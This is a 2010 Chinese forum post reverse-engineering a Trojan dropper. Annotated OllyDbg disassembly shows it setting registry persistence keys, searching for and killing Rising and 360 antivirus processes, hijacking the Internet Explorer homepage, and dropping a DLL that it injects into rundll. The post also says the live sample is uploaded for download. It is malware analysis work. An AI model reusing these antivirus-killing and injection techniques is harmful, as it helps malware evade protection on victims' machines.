Trojan-Dropper.Win32.Ekafod.no(卡巴定义)
本帖最后由 robey 于 2010-7-10 13:12 编辑这病毒样本是早两天得到的。刚刚在线杀毒,国内的杀毒软件都还未定义。看到贴的不仿下下来看看你的杀毒软件可以查杀吗!病毒样本已经上传!
感谢昨天打击我的人(自己),昨晚搞到12点写出来的文章,以曾加自信心用。由于是最新病毒,所以贴出来。晚点下载就会被杀毒软件加到特征库去了。本人QQ:591841426(学习交流之用,求破者勿扰)
嫌话少说!开始。
得到的这个样本未加壳,长度为“256,144”字节,该样本使用“VC++”编写
MD5值:F5E39FD21E72F15A966F90AA35725B87
1、先来看看病毒主体
00401660 >/$ 55 PUSH EBP //载入停在这里
00401661 |. 8BEC MOV EBP,ESP
00401663 |. 6A FF PUSH -1
00401665 |. 68 A8524000 PUSH 复件_123.004052A8
0040166A |. 68 5A164000 PUSH <JMP.&MSVCRT._except_handler3> ; SE 处理程序安装
0040166F |. 64:A1 0000000>MOV EAX,DWORD PTR FS:
00401675 |. 50 PUSH EAX
00401676 |. 64:8925 00000>MOV DWORD PTR FS:,ESP
0040167D |. 83EC 68 SUB ESP,68
00401680 |. 53 PUSH EBX
00401681 |. 56 PUSH ESI
00401682 |. 57 PUSH EDI
00401683 |. 8965 E8 MOV DWORD PTR SS:,ESP
00401686 |. 33DB XOR EBX,EBX
00401688 |. 895D FC MOV DWORD PTR SS:,EBX
0040168B |. 6A 02 PUSH 2
0040168D |. FF15 50514000 CALL DWORD PTR DS:[<&MSVCRT.__set_app_ty>; msvcrt.__set_app_type
00401693 |. 59 POP ECX
00401694 |. 830D 10E64300>OR DWORD PTR DS:,FFFFFFFF
0040169B |. 830D 14E64300>OR DWORD PTR DS:,FFFFFFFF
004016A2 |. FF15 54514000 CALL DWORD PTR DS:[<&MSVCRT.__p__fmode>] ; msvcrt.__p__fmode
004016A8 |. 8B0D 04E64300 MOV ECX,DWORD PTR DS:
004016AE |. 8908 MOV DWORD PTR DS:,ECX
004016B0 |. FF15 58514000 CALL DWORD PTR DS:[<&MSVCRT.__p__commode>; msvcrt.__p__commode
004016B6 |. 8B0D 00E64300 MOV ECX,DWORD PTR DS:
004016BC |. 8908 MOV DWORD PTR DS:,ECX
004016BE |. A1 5C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._adjust_f>
004016C3 |. 8B00 MOV EAX,DWORD PTR DS:
004016C5 |. A3 0CE64300 MOV DWORD PTR DS:,EAX
004016CA |. E8 16010000 CALL 复件_123.004017E5
004016CF |. 391D 10E44300 CMP DWORD PTR DS:,EBX
004016D5 |. 75 0C JNZ SHORT 复件_123.004016E3
004016D7 |. 68 E2174000 PUSH 复件_123.004017E2
004016DC |. FF15 60514000 CALL DWORD PTR DS:[<&MSVCRT.__setusermat>; msvcrt.__setusermatherr
004016E2 |. 59 POP ECX
004016E3 |> E8 E8000000 CALL 复件_123.004017D0
004016E8 |. 68 1C604000 PUSH 复件_123.0040601C
004016ED |. 68 18604000 PUSH 复件_123.00406018
004016F2 |. E8 D3000000 CALL <JMP.&MSVCRT._initterm>
004016F7 |. A1 FCE54300 MOV EAX,DWORD PTR DS:
004016FC |. 8945 94 MOV DWORD PTR SS:,EAX
004016FF |. 8D45 94 LEA EAX,DWORD PTR SS:
00401702 |. 50 PUSH EAX
00401703 |. FF35 F8E54300 PUSH DWORD PTR DS:
00401709 |. 8D45 9C LEA EAX,DWORD PTR SS:
0040170C |. 50 PUSH EAX
0040170D |. 8D45 90 LEA EAX,DWORD PTR SS:
00401710 |. 50 PUSH EAX
00401711 |. 8D45 A0 LEA EAX,DWORD PTR SS:
00401714 |. 50 PUSH EAX
00401715 |. FF15 68514000 CALL DWORD PTR DS:[<&MSVCRT.__getmainarg>; msvcrt.__getmainargs
0040171B |. 68 14604000 PUSH 复件_123.00406014
00401720 |. 68 00604000 PUSH 复件_123.00406000
00401725 |. E8 A0000000 CALL <JMP.&MSVCRT._initterm>
0040172A |. 83C4 24 ADD ESP,24
0040172D |. A1 6C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._acmdln>]
00401732 |. 8B30 MOV ESI,DWORD PTR DS:
00401734 |. 8975 8C MOV DWORD PTR SS:,ESI
00401737 |. 803E 22 CMP BYTE PTR DS:,22
0040173A |. 75 3A JNZ SHORT 复件_123.00401776
0040173C |> 46 /INC ESI //从这里开始是获取自身目录
0040173D |. 8975 8C |MOV DWORD PTR SS:,ESI
00401740 |. 8A06 |MOV AL,BYTE PTR DS:
00401742 |. 3AC3 |CMP AL,BL
00401744 |. 74 04 |JE SHORT 复件_123.0040174A
00401746 |. 3C 22 |CMP AL,22
00401748 |.^ 75 F2 \JNZ SHORT 复件_123.0040173C //循环到此结束
0040174A |> 803E 22 CMP BYTE PTR DS:,22
0040174D |. 75 04 JNZ SHORT 复件_123.00401753
0040174F |> 46 INC ESI
00401750 |. 8975 8C MOV DWORD PTR SS:,ESI
00401753 |> 8A06 MOV AL,BYTE PTR DS:
00401755 |. 3AC3 CMP AL,BL
00401757 |. 74 04 JE SHORT 复件_123.0040175D
00401759 |. 3C 20 CMP AL,20
0040175B |.^ 76 F2 JBE SHORT 复件_123.0040174F
0040175D |> 895D D0 MOV DWORD PTR SS:,EBX
00401760 |. 8D45 A4 LEA EAX,DWORD PTR SS:
00401763 |. 50 PUSH EAX ; /pStartupinfo
00401764 |. FF15 48504000 CALL DWORD PTR DS:[<&KERNEL32.GetStartup>; \GetStartupInfoA
0040176A |. F645 D0 01 TEST BYTE PTR SS:,1
0040176E |. 74 11 JE SHORT 复件_123.00401781
00401770 |. 0FB745 D4 MOVZX EAX,WORD PTR SS:
00401774 |. EB 0E JMP SHORT 复件_123.00401784
00401776 |> 803E 20 /CMP BYTE PTR DS:,20
00401779 |.^ 76 D8 |JBE SHORT 复件_123.00401753
0040177B |. 46 |INC ESI
0040177C |. 8975 8C |MOV DWORD PTR SS:,ESI
0040177F |.^ EB F5 \JMP SHORT 复件_123.00401776
00401781 |> 6A 0A PUSH 0A
00401783 |. 58 POP EAX
00401784 |> 50 PUSH EAX
00401785 |. 56 PUSH ESI
00401786 |. 53 PUSH EBX
00401787 |. 53 PUSH EBX ; /pModule
00401788 |. FF15 44504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleH>; \GetModuleHandleA
0040178E |. 50 PUSH EAX
0040178F |. E8 6A000000 CALL 复件_123.004017FE //程序主要的CALL
00401794 |. 8945 98 MOV DWORD PTR SS:,EAX
00401797 |. 50 PUSH EAX ; /status
00401798 |. FF15 70514000 CALL DWORD PTR DS:[<&MSVCRT.exit>] ; \exit
0040179E |. 8B45 EC MOV EAX,DWORD PTR SS:
004017A1 |. 8B08 MOV ECX,DWORD PTR DS:
004017A3 |. 8B09 MOV ECX,DWORD PTR DS:
004017A5 |. 894D 88 MOV DWORD PTR SS:,ECX
004017A8 |. 50 PUSH EAX
004017A9 |. 51 PUSH ECX
004017AA |. E8 15000000 CALL <JMP.&MSVCRT._XcptFilter>
004017AF |. 59 POP ECX
004017B0 |. 59 POP ECX
004017B1 \. C3 RETN
2、主要行为代码段
0040443F .B8 5C194000 MOV EAX,复件_123.0040195C
00404444 .E8 A7D1FFFF CALL 复件_123.004015F0
00404449 .51 PUSH ECX
0040444A .56 PUSH ESI
0040444B .8D45 F0 LEA EAX,DWORD PTR SS:
0040444E .57 PUSH EDI
0040444F .50 PUSH EAX
00404450 .E8 93CEFFFF CALL 复件_123.004012E8
00404455 .59 POP ECX
00404456 .8365 FC 00 AND DWORD PTR SS:,0
0040445A .50 PUSH EAX
0040445B .B9 E4E54300 MOV ECX,复件_123.0043E5E4
00404460 .E8 43D1FFFF CALL <JMP.&MFC42.#858_??4CString@@QAEABV>
00404465 .834D FC FF OR DWORD PTR SS:,FFFFFFFF
00404469 .8D4D F0 LEA ECX,DWORD PTR SS:
0040446C .E8 3BD0FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00404471 .E8 8AEBFFFF CALL 复件_123.00403000 //创建注册表
00404476 .E8 E4EFFFFF CALL 复件_123.0040345F //创建注册表
0040447B .8B35 54504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.Sleep>] ;kernel32.Sleep
00404481 .BF C8000000 MOV EDI,0C8
00404486 .57 PUSH EDI ; /Timeout => 200. ms
00404487 .FFD6 CALL ESI ; \Sleep //睡眠200.ms
00404489 .E8 72FBFFFF CALL 复件_123.00404000 //遍历进程查找ravmond.exe
0040448E .85C0 TEST EAX,EAX
00404490 .74 0C JE SHORT 复件_123.0040449E
00404492 .E8 1CFEFFFF CALL 复件_123.004042B3
00404497 .E8 75FEFFFF CALL 复件_123.00404311
0040449C .EB 0E JMP SHORT 复件_123.004044AC
0040449E >E8 E6FEFFFF CALL 复件_123.00404389 //遍历进程查找360tray.exe
004044A3 .85C0 TEST EAX,EAX
004044A5 .75 05 JNZ SHORT 复件_123.004044AC
004044A7 .E8 2EFDFFFF CALL 复件_123.004041DA //查找IEXPLORE.EXE锁定主页为 http://www.rom12580.cn
004044AC >57 PUSH EDI
004044AD .FFD6 CALL ESI
004044AF .E8 16ECFFFF CALL 复件_123.004030CA //开始释放文件
004044B4 .E8 58EDFFFF CALL 复件_123.00403211 //创建目录释放文件
004044B9 .A3 ECE54300 MOV DWORD PTR DS:,EAX
004044BE .E8 EEEEFFFF CALL 复件_123.004033B1 //释放iksii.dll文件
004044C3 .57 PUSH EDI
004044C4 .FFD6 CALL ESI
004044C6 .E8 D6EDFFFF CALL 复件_123.004032A1 //注入到rundll.exe进程,并运行
004044CB .BF E8030000 MOV EDI,3E8
004044D0 .57 PUSH EDI
004044D1 .FFD6 CALL ESI
004044D3 .E8 9FCBFFFF CALL 复件_123.00401077 //释放病毒体
004044D8 .57 PUSH EDI
004044D9 .FFD6 CALL ESI
004044DB .E8 C4FBFFFF CALL 复件_123.004040A4
004044E0 .8B4D F4 MOV ECX,DWORD PTR SS:
004044E3 .5F POP EDI
004044E4 .33C0 XOR EAX,EAX
004044E6 .5E POP ESI
004044E7 .64:890D 00000>MOV DWORD PTR FS:,ECX
004044EE .C9 LEAVE
004044EF .C3 RETN
3、创建注册表键值
0040141D/$B8 8C184000 MOV EAX,复件_123.0040188C
00401422|.E8 C9010000 CALL 复件_123.004015F0
00401427|.83EC 0C SUB ESP,0C
0040142A|.8365 FC 00 AND DWORD PTR SS:,0
0040142E|.8D4D E8 LEA ECX,DWORD PTR SS:
00401431|.E8 C7FCFFFF CALL 复件_123.004010FD
00401436|.68 60E04300 PUSH 复件_123.0043E060 ;ASCII "SOFTWARE\Softfy\PlugName"
0040143B|.68 02000080 PUSH 80000002
00401440|.8D4D E8 LEA ECX,DWORD PTR SS:
00401443|.C645 FC 01 MOV BYTE PTR SS:,1
00401447|.E8 4BFDFFFF CALL 复件_123.00401197 //创建注册表项
0040144C|.85C0 TEST EAX,EAX
0040144E|.75 20 JNZ SHORT 复件_123.00401470
00401450|.FF75 08 PUSH DWORD PTR SS:
00401453|.8D4D E8 LEA ECX,DWORD PTR SS:
00401456|.68 54E04300 PUSH 复件_123.0043E054 ;ASCII "LogonName"
0040145B|.E8 BB0B0000 CALL 复件_123.0040201B //设置logonname值
00401460|.FF75 08 PUSH DWORD PTR SS:
00401463|.8D4D E8 LEA ECX,DWORD PTR SS:
00401466|.68 44E04300 PUSH 复件_123.0043E044 ;ASCII "LogonMainName"
0040146B|.E8 AB0B0000 CALL 复件_123.0040201B //设置LogonMainName
00401470|>8D4D E8 LEA ECX,DWORD PTR SS:
00401473|.E8 55FDFFFF CALL 复件_123.004011CD //关闭设置
00401478|.8065 FC 00 AND BYTE PTR SS:,0
0040147C|.8D4D E8 LEA ECX,DWORD PTR SS:
0040147F|.E8 AEFCFFFF CALL 复件_123.00401132
00401484|.834D FC FF OR DWORD PTR SS:,FFFFFFFF
00401488|.8D4D 08 LEA ECX,DWORD PTR SS:
0040148B|.E8 1C000000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00401490|.8B4D F4 MOV ECX,DWORD PTR SS:
00401493|.64:890D 00000>MOV DWORD PTR FS:,ECX
0040149A|.C9 LEAVE
0040149B\.C3 RETN
4、创建键值HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\PlugName
00401197/$55 PUSH EBP
00401198|.8BEC MOV EBP,ESP
0040119A|.51 PUSH ECX
0040119B|.56 PUSH ESI ;复件_123.0043E5E8
0040119C|.8BF1 MOV ESI,ECX
0040119E|.FF75 0C PUSH DWORD PTR SS:
004011A1|.8D4E 08 LEA ECX,DWORD PTR DS:
004011A4|.E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004011A9|.8D45 FC LEA EAX,DWORD PTR SS:
004011AC|.83C6 04 ADD ESI,4
004011AF|.50 PUSH EAX ; /pDisposition
004011B0|.33C0 XOR EAX,EAX ; |
004011B2|.56 PUSH ESI ; |pHandle
004011B3|.50 PUSH EAX ; |pSecurity => NULL
004011B4|.68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004011B9|.50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA|.50 PUSH EAX ; |Class => NULL
004011BB|.50 PUSH EAX ; |Reserved => 0
004011BC|.FF75 0C PUSH DWORD PTR SS: ; |Subkey
004011BF|.FF75 08 PUSH DWORD PTR SS: ; |hKey
004011C2|.FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
004011C8|.5E POP ESI
004011C9|.C9 LEAVE
004011CA\.C2 0800 RETN 8
5、还是创建注册表值
0040345F/$B8 F8184000 MOV EAX,复件_123.004018F8
00403464|.E8 87E1FFFF CALL 复件_123.004015F0
00403469|.83EC 30 SUB ESP,30
0040346C|.53 PUSH EBX
0040346D|.56 PUSH ESI
0040346E|.8D4D C4 LEA ECX,DWORD PTR SS:
00403471|.E8 4AE1FFFF CALL <JMP.&MFC42.#354_??0CFile@@QAE@XZ>
00403476|.33DB XOR EBX,EBX
00403478|.8D4D E0 LEA ECX,DWORD PTR SS:
0040347B|.895D FC MOV DWORD PTR SS:,EBX
0040347E|.E8 1DE0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00403483|.8D4D E4 LEA ECX,DWORD PTR SS:
00403486|.C645 FC 01 MOV BYTE PTR SS:,1
0040348A|.E8 11E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040348F|.8D4D E8 LEA ECX,DWORD PTR SS:
00403492|.C645 FC 02 MOV BYTE PTR SS:,2
00403496|.E8 05E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040349B|.8D4D EC LEA ECX,DWORD PTR SS:
0040349E|.C645 FC 03 MOV BYTE PTR SS:,3
004034A2|.E8 F9DFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034A7|.68 6CE24300 PUSH 复件_123.0043E26C ;ASCII "full80"
004034AC|.8D4D E4 LEA ECX,DWORD PTR SS:
004034AF|.C645 FC 04 MOV BYTE PTR SS:,4
004034B3|.E8 FADFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034B8|.68 68E24300 PUSH 复件_123.0043E268 ;ASCII "C2"
004034BD|.8D4D E8 LEA ECX,DWORD PTR SS:
004034C0|.E8 EDDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034C5|.68 60E24300 PUSH 复件_123.0043E260 ;ASCII "1.0.1"
004034CA|.8D4D EC LEA ECX,DWORD PTR SS:
004034CD|.E8 E0DFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034D2|.8D4D D4 LEA ECX,DWORD PTR SS:
004034D5|.E8 23DCFFFF CALL 复件_123.004010FD
004034DA|.8D4D F0 LEA ECX,DWORD PTR SS:
004034DD|.C645 FC 05 MOV BYTE PTR SS:,5
004034E1|.E8 BADFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034E6|.68 44E24300 PUSH 复件_123.0043E244 ;ASCII " SOFTWARE\Softfy\Plug"
004034EB|.8D4D F0 LEA ECX,DWORD PTR SS:
004034EE|.C645 FC 06 MOV BYTE PTR SS:,6
004034F2|.E8 BBDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034F7|.8D4D F0 LEA ECX,DWORD PTR SS:
004034FA|.E8 BBE0FFFF CALL <JMP.&MFC42.#6282_?TrimLeft@CString>
004034FF|.8D4D F0 LEA ECX,DWORD PTR SS:
00403502|.E8 ADE0FFFF CALL <JMP.&MFC42.#6283_?TrimRight@CStrin>
00403507|.FF75 F0 PUSH DWORD PTR SS:
0040350A|.BE 02000080 MOV ESI,80000002
0040350F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403512|.56 PUSH ESI
00403513|.E8 7FDCFFFF CALL 复件_123.00401197 //创建注册表键值
00403518|.85C0 TEST EAX,EAX
0040351A|.75 7B JNZ SHORT 复件_123.00403597
0040351C|.FF75 E4 PUSH DWORD PTR SS:
0040351F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403522|.68 34E24300 PUSH 复件_123.0043E234 ;ASCII "PlugUserName"
00403527|.E8 EFEAFFFF CALL 复件_123.0040201B //设置注册表键值
0040352C|.FF75 E8 PUSH DWORD PTR SS:
0040352F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403532|.68 24E24300 PUSH 复件_123.0043E224 ;ASCII "PlugSoftName"
00403537|.E8 DFEAFFFF CALL 复件_123.0040201B //设置注册表键值
0040353C|.FF75 EC PUSH DWORD PTR SS:
0040353F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403542|.68 18E24300 PUSH 复件_123.0043E218 ;ASCII "PlugSoftVer"
00403547|.E8 CFEAFFFF CALL 复件_123.0040201B //设置注册表键值
0040354C|.53 PUSH EBX
0040354D|.68 0CE24300 PUSH 复件_123.0043E20C ;ASCII "PlugSendNum"
00403552|.8D4D D4 LEA ECX,DWORD PTR SS:
00403555|.E8 A6EAFFFF CALL 复件_123.00402000 ////设置注册表键值
0040355A|.53 PUSH EBX
0040355B|.68 00E24300 PUSH 复件_123.0043E200 ;ASCII "PlugStat"
00403560|.8D4D D4 LEA ECX,DWORD PTR SS:
00403563|.E8 98EAFFFF CALL 复件_123.00402000 ////设置注册表键值
00403568|.68 F8E14300 PUSH 复件_123.0043E1F8 ;ASCII "3.6.7"
0040356D|.68 ECE14300 PUSH 复件_123.0043E1EC ;ASCII "PlugUpdate"
00403572|.8D4D D4 LEA ECX,DWORD PTR SS:
00403575|.E8 A1EAFFFF CALL 复件_123.0040201B ////设置注册表键值
0040357A|.6A 01 PUSH 1
0040357C|.68 E4E14300 PUSH 复件_123.0043E1E4 ;ASCII "CoreDll"
00403581|.8D4D D4 LEA ECX,DWORD PTR SS:
00403584|.E8 77EAFFFF CALL 复件_123.00402000 ////设置注册表键值
00403589|.53 PUSH EBX
0040358A|.68 D8E14300 PUSH 复件_123.0043E1D8 ;ASCII "LoadNums"
0040358F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403592|.E8 69EAFFFF CALL 复件_123.00402000 ////设置注册表键值
00403597|>57 PUSH EDI
00403598|.8D4D D4 LEA ECX,DWORD PTR SS:
0040359B|.E8 2DDCFFFF CALL 复件_123.004011CD //关闭注册表
004035A0|.68 BCE14300 PUSH 复件_123.0043E1BC ;ASCII "SOFTWARE\Softfy\PlugDown"
004035A5|.56 PUSH ESI
004035A6|.8D4D D4 LEA ECX,DWORD PTR SS:
004035A9|.E8 E9DBFFFF CALL 复件_123.00401197 //下面都是创建注册表键值,就不多说了。
004035AE|.85C0 TEST EAX,EAX
004035B0|.BF B4E14300 MOV EDI,复件_123.0043E1B4 ;ASCII "1.0.0"
004035B5|.75 1C JNZ SHORT 复件_123.004035D3
004035B7|.57 PUSH EDI
004035B8|.68 ACE14300 PUSH 复件_123.0043E1AC ;ASCII "PlugOne"
004035BD|.8D4D D4 LEA ECX,DWORD PTR SS:
004035C0|.E8 56EAFFFF CALL 复件_123.0040201B
004035C5|.57 PUSH EDI
004035C6|.68 A4E14300 PUSH 复件_123.0043E1A4 ;ASCII "PlugTwo"
004035CB|.8D4D D4 LEA ECX,DWORD PTR SS:
004035CE|.E8 48EAFFFF CALL 复件_123.0040201B
004035D3|>8D4D D4 LEA ECX,DWORD PTR SS:
004035D6|.E8 F2DBFFFF CALL 复件_123.004011CD
004035DB|.68 8CE14300 PUSH 复件_123.0043E18C ;ASCII "SOFTWARE\Softfy\WebIni"
004035E0|.56 PUSH ESI
004035E1|.8D4D D4 LEA ECX,DWORD PTR SS:
004035E4|.E8 AEDBFFFF CALL 复件_123.00401197
004035E9|.85C0 TEST EAX,EAX
004035EB|.75 32 JNZ SHORT 复件_123.0040361F
004035ED|.57 PUSH EDI
004035EE|.68 80E14300 PUSH 复件_123.0043E180 ;ASCII "WebIniVer"
004035F3|.8D4D D4 LEA ECX,DWORD PTR SS:
004035F6|.E8 20EAFFFF CALL 复件_123.0040201B
004035FB|.E8 10010000 CALL 复件_123.00403710
00403600|.0FB7C0 MOVZX EAX,AX
00403603|.50 PUSH EAX
00403604|.68 70E14300 PUSH 复件_123.0043E170 ;ASCII "WebIniSection"
00403609|.8D4D D4 LEA ECX,DWORD PTR SS:
0040360C|.E8 EFE9FFFF CALL 复件_123.00402000
00403611|.53 PUSH EBX
00403612|.68 64E14300 PUSH 复件_123.0043E164 ;ASCII "HitProbaby"
00403617|.8D4D D4 LEA ECX,DWORD PTR SS:
0040361A|.E8 E1E9FFFF CALL 复件_123.00402000
0040361F|>8D4D D4 LEA ECX,DWORD PTR SS:
00403622|.E8 A6DBFFFF CALL 复件_123.004011CD
00403627|.68 48E14300 PUSH 复件_123.0043E148 ;ASCII "SOFTWARE\Softfy\LockPage"
0040362C|.56 PUSH ESI
0040362D|.8D4D D4 LEA ECX,DWORD PTR SS:
00403630|.E8 62DBFFFF CALL 复件_123.00401197
00403635|.85C0 TEST EAX,EAX
00403637|.5F POP EDI
00403638|.75 1C JNZ SHORT 复件_123.00403656
0040363A|.53 PUSH EBX
0040363B|.68 3CE14300 PUSH 复件_123.0043E13C ;ASCII "LockPageNum" //注册表键值
00403640|.8D4D D4 LEA ECX,DWORD PTR SS:
00403643|.E8 B8E9FFFF CALL 复件_123.00402000
00403648|.53 PUSH EBX
00403649|.68 2CE14300 PUSH 复件_123.0043E12C ;ASCII "NeedLockPage"//注册表键值
0040364E|.8D4D D4 LEA ECX,DWORD PTR SS:
00403651|.E8 AAE9FFFF CALL 复件_123.00402000
00403656|>8D4D D4 LEA ECX,DWORD PTR SS:
00403659|.E8 6FDBFFFF CALL 复件_123.004011CD
0040365E|.68 14E14300 PUSH 复件_123.0043E114 ;ASCII "SOFTWARE\Softfy\CSID"//注册表项
00403663|.56 PUSH ESI
00403664|.8D4D D4 LEA ECX,DWORD PTR SS:
00403667|.E8 2BDBFFFF CALL 复件_123.00401197
0040366C|.85C0 TEST EAX,EAX
0040366E|.75 37 JNZ SHORT 复件_123.004036A7
00403670|.68 ECE04300 PUSH 复件_123.0043E0EC ;ASCII "{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}"
00403675|.68 E4E04300 PUSH 复件_123.0043E0E4 ;ASCII "csid"
0040367A|.8D4D D4 LEA ECX,DWORD PTR SS:
0040367D|.E8 99E9FFFF CALL 复件_123.0040201B //创建注册表csid,锁定主页.
00403682|.FF35 E4E54300 PUSH DWORD PTR DS:
00403688|.8D4D D4 LEA ECX,DWORD PTR SS:
0040368B|.68 DCE04300 PUSH 复件_123.0043E0DC ;ASCII "dllname"
00403690|.E8 86E9FFFF CALL 复件_123.0040201B
00403695|.68 9CE04300 PUSH 复件_123.0043E09C ;ASCII "D:\ssshall"
0040369A|.68 D4E04300 PUSH 复件_123.0043E0D4 ;ASCII "dllpath"
0040369F|.8D4D D4 LEA ECX,DWORD PTR SS:
004036A2|.E8 74E9FFFF CALL 复件_123.0040201B
004036A7|>8D4D D4 LEA ECX,DWORD PTR SS:
004036AA|.E8 1EDBFFFF CALL 复件_123.004011CD //关闭注册表
004036AF|.8D4D F0 LEA ECX,DWORD PTR SS:
004036B2|.C645 FC 05 MOV BYTE PTR SS:,5
004036B6|.E8 F1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036BB|.8D4D D4 LEA ECX,DWORD PTR SS:
004036BE|.C645 FC 04 MOV BYTE PTR SS:,4
004036C2|.E8 6BDAFFFF CALL 复件_123.00401132
004036C7|.8D4D EC LEA ECX,DWORD PTR SS:
004036CA|.C645 FC 03 MOV BYTE PTR SS:,3
004036CE|.E8 D9DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036D3|.8D4D E8 LEA ECX,DWORD PTR SS:
004036D6|.C645 FC 02 MOV BYTE PTR SS:,2
004036DA|.E8 CDDDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036DF|.8D4D E4 LEA ECX,DWORD PTR SS:
004036E2|.C645 FC 01 MOV BYTE PTR SS:,1
004036E6|.E8 C1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036EB|.8D4D E0 LEA ECX,DWORD PTR SS:
004036EE|.885D FC MOV BYTE PTR SS:,BL
004036F1|.E8 B6DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036F6|.834D FC FF OR DWORD PTR SS:,FFFFFFFF
004036FA|.8D4D C4 LEA ECX,DWORD PTR SS:
004036FD|.E8 ACDEFFFF CALL <JMP.&MFC42.#665_??1CFile@@UAE@XZ>
00403702|.8B4D F4 MOV ECX,DWORD PTR SS:
00403705|.5E POP ESI
00403706|.5B POP EBX
00403707|.64:890D 00000>MOV DWORD PTR FS:,ECX
0040370E|.C9 LEAVE
0040370F\.C3 RETN
6、创建注册项HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\Plug
00401197/$55 PUSH EBP
00401198|.8BEC MOV EBP,ESP
0040119A|.51 PUSH ECX
0040119B|.56 PUSH ESI
0040119C|.8BF1 MOV ESI,ECX
0040119E|.FF75 0C PUSH DWORD PTR SS:
004011A1|.8D4E 08 LEA ECX,DWORD PTR DS:
004011A4|.E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004011A9|.8D45 FC LEA EAX,DWORD PTR SS:
004011AC|.83C6 04 ADD ESI,4
004011AF|.50 PUSH EAX ; /pDisposition
004011B0|.33C0 XOR EAX,EAX ; |
004011B2|.56 PUSH ESI ; |pHandle
004011B3|.50 PUSH EAX ; |pSecurity => NULL
004011B4|.68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004011B9|.50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA|.50 PUSH EAX ; |Class => NULL
004011BB|.50 PUSH EAX ; |Reserved => 0
004011BC|.FF75 0C PUSH DWORD PTR SS: ; |Subkey
004011BF|.FF75 08 PUSH DWORD PTR SS: ; |hKey
004011C2|.FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
004011C8|.5E POP ESI
004011C9|.C9 LEAVE
004011CA\.C2 0800 RETN 8
7、遍历进程查找ravmond.exe(瑞星杀毒软件)找到就干掉
00404000/$B8 0C194000 MOV EAX,复件_123.0040190C
00404005|.E8 E6D5FFFF CALL 复件_123.004015F0
0040400A|.81EC 2C010000 SUB ESP,12C
00404010|.56 PUSH ESI
00404011|.8D4D F0 LEA ECX,DWORD PTR SS:
00404014|.E8 87D4FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00404019|.8365 FC 00 AND DWORD PTR SS:,0
0040401D|.6A 00 PUSH 0 ; /ProcessID = 0
0040401F|.6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404021|.E8 D2D7FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot//创建进程快照准备查找进程
00404026|.8BF0 MOV ESI,EAX
00404028|.8D85 C8FEFFFF LEA EAX,DWORD PTR SS:
0040402E|.50 PUSH EAX ; /pProcessentry
0040402F|.56 PUSH ESI ; |hSnapshot
00404030|.C785 C8FEFFFF>MOV DWORD PTR SS:,128 ; |
0040403A|.E8 B3D7FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
0040403F|>85C0 /TEST EAX,EAX
00404041|.74 3D |JE SHORT 复件_123.00404080
00404043|.8D85 ECFEFFFF |LEA EAX,DWORD PTR SS:
00404049|.8D4D F0 |LEA ECX,DWORD PTR SS:
0040404C|.50 |PUSH EAX
0040404D|.E8 60D4FFFF |CALL <JMP.&MFC42.#860_??4CString@@QAEAB>
00404052|.8D4D F0 |LEA ECX,DWORD PTR SS:
00404055|.E8 72D5FFFF |CALL <JMP.&MFC42.#4202_?MakeLower@CStri>
0040405A|.68 74E24300 |PUSH 复件_123.0043E274 ;ASCII "ravmond.exe"
0040405F|.8D4D F0 |LEA ECX,DWORD PTR SS:
00404062|.E8 5FD5FFFF |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00404067|.83F8 FF |CMP EAX,-1
0040406A|.75 0F |JNZ SHORT 复件_123.0040407B
0040406C|.8D85 C8FEFFFF |LEA EAX,DWORD PTR SS:
00404072|.50 |PUSH EAX ; /pProcessentry
00404073|.56 |PUSH ESI ; |hSnapshot
00404074|.E8 73D7FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404079|.^ EB C4 \JMP SHORT 复件_123.0040403F
0040407B|>6A 01 PUSH 1
0040407D|.5E POP ESI
0040407E|.EB 09 JMP SHORT 复件_123.00404089
00404080|>56 PUSH ESI ; /hObject
00404081|.FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
